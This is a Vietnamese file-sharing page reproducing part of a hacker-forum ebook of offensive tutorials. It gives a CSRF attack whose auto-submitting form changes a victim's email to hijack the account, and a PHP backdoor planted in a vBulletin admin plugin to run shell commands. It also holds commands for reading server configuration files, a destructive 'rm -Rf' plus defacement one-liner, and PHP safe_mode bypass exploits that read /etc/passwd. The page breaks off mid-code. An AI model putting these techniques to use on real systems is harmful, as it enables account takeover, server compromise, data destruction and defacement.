1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 275 doc

6 142 1
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 181,54 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Tìm hiểu về cách hoạt động của form: VD khi user sử dụng update email option thì form sẽ có dạng: khi data được gửi = form trên tới server thì server sẽ check xem user nào gửi tới +

Trang 1

4 Sử dụng cách 3:

4.1 Tìm hiểu về cách hoạt động của form:

VD khi user sử dụng update email option thì form sẽ có dạng:

<form method="post" action="update.php">

<input type="text" name="email" value="user@email.com">

<input type="submit" name="but" value="send">

</form>

khi data được gửi = form trên tới server thì server sẽ check xem user nào gửi tới + right to update của user đó rồi thực hiện request

4.2 Làm sao "nhờ" user sử dụng form trên theo ý mình?

Gửi cho user một html page trong đó có:

+ form trên nhưng các value của input theo ý mình (vd: hacker@email.com)

+ sử dụng thêm hàm auto submit form để khi user mở html file này thì form sẽ tự động submit, tag này có dạng:

<body onLoad="document.forms[0].submit();">

+ nên sử dụng thêm một vài tiểu xảo che mắt user, không cho user biết là option của mình đã bị sử dụng trái phép < tự tìm hiểu

5 Kết quả: vì request này được gửi đi từ máy user + thêm đk cần là user đang online nên session/cookies check đều ok Request vẫn được thực hiện kể cả user không online nhưng để chế độ nhớ password Ở vd trên ta đã update được user email, từ đó dùng option forgot pass để lấy password của user này (cái này ai cũng biết )

6 Ưu nhược điểm:

- Ưu điểm: phương pháp đơn giản, chỉ dựa trên nguyên tắc hoạt động thông thường của form < không phải là lỗi bảo mật Có thể sử dụng được nhiều option của user

mà không cần phải login = user account (vd có thể update user info, gửi bài, xoá bài, pm với nick của user, một số forum Admin CP khơng được pwd protected & biết admin default path ta có thể "nhờ" admin update mình lên làm admin luôn, hehe)

- Nhược điểm: phụ thuộc nhiều vào độ cảnh giác của user (eg: disable js)(tuy nhiên theo kinh nghiệm của tớ thì chưa ai từ chối bấm vào html link cả ) + cái gì đó chưa nghĩ ra

7 Chống hack=cách này:

Trang 2

+ Protect user panel/update action file = một lần password nữa (khi user muốn update info thì phải gõ lại pass)

+ khi form được submit thì kiểm tra xem các variable trong form đến từ đâu, nếu HTTP_REFERER không phải từ web của mình thì không thực hiện request

+ chưa nghĩ ra

8 Kết luận: có thể áp dụng cái natural danger của http này vào nhiều cái để nghịch, không chỉ hack forum

ksvthdang(HcE Gr0up)

bổ sung:

9 Social engineering !

black_hat_cr(HCE)

Chạy Shell trong ACP của vBB !

Thấy có nhiều bạn thắc mắc về run shell code trong acp của vBB nên post lên tham khảo chơi !

Khi các bạn đã vào được ACP của 4rum vBB rồi thì hãy để ý chỗ "Plugin

Manager" ! Click vào và bạn chọn "Edit" 1 plugin nào đó bạn sẽ thấy nó thực thi

mã php ! Ok ! MÀ đã chạy được mã php rồi các bạn chắc đã biết phải làm gì rồi chứ

vd :

Tui edit : Top 'X' Stats by InfiniteWebby ( forum có hack mod top statics )

nội dung :

PHP Code:

if (THIS_SCRIPT == "index" OR THIS_SCRIPT == "topXstats") {

global $globaltemplates;

$globaltemplates = array_merge($globaltemplates, array('topXstats_stats_b it', 'topXstats_member_bit', 'topXstats_poster_bit', 'topXstats_thread_bit')); }

Trang 3

vậy tui chỉ cần thêm vào :

PHP Code:

if($_REQUEST['langtu']=="haohoa")

{

system('ls');

}

rồi run : http://xxx.com/forum/topXstats.php?langtu=haohoa !

sẽ thấy kết quả Khá đơn giản phải ko

Nếu đã thực thi được php code rồi thì mình có thể làm cả khối việc trên cái host í

langtuhaohoa(HCE)

Những CMD thường dùng khi Hack local

Đây là các lệnh thường dùng của những hacker khi hack local bạn xem thữ nhé'

cat /etc/httpd/conf/httpd.conf|grep ServerName

cat /etc/httpd/conf/httpd.conf

cat /etc/localdomains

cat /etc/trueuserdomains

cat /etc/userdomains

Borrado de archivos y logs "Gracias megabyte":

-

rm -Rf * && mkdir public_html &&

echo "was here!" > public_html/index.html

-

Para hacer el index:

-

touch index.html

Trang 4

echo "Was here!">index.html

cp index.html public_html

Vns3curity(HCE)

1 vài chiêu thức local !

sưu tầm từ nhiều người !

1 Cho php 4.2 và 5.12 trở xuống: thanks to Maksymilian Arciemowicz

Code:

<?php

/*

Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2

by Maksymilian Arciemowicz

*/

$file=""; // File to Include or use _GET _POST

$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp

echo "<PRE>\n";

if(empty($file)){

if(empty($_GET['file'])){

if(empty($_POST['file'])){

die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like

?file=/etc/passwd\n <B><CENTER><FONT

COLOR=\"RED\">SecurityReason.Com

Exploit</FONT></CENTER></B>");

} else {

$file=$_POST['file'];

}

} else {

$file=$_GET['file'];

}

}

$temp=tempnam($tymczas, "cx");

Trang 5

if(copy("compress.zlib://".$file, $temp)){

$zrodlo = fopen($temp, "r");

$tekst = fread($zrodlo, filesize($temp));

fclose($zrodlo);

echo "<B> - Start File ".htmlspecialchars($file)."

-</B>\n".htmlspecialchars($tekst)."\n<B> - End File

".htmlspecialchars($file)." -\n";

unlink($temp);

die("\n<FONT COLOR=\"RED\"><B>File

".htmlspecialchars($file)." has been already loaded SecurityReason Team

;]</B></FONT>");

} else {

die("<FONT COLOR=\"RED\"><CENTER>Sorry File

<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have

access.</CENTER></FONT>");

}

?>

2 cho php 4.4 và 5.16 trở xuống (thanks to Maksymilian Arciemowicz) local qua php_admin* bypass by ini_restore() !!

Code:

<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>

3

Code:

<?

$vnforce = @imap_open("/path/file", "", "");

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN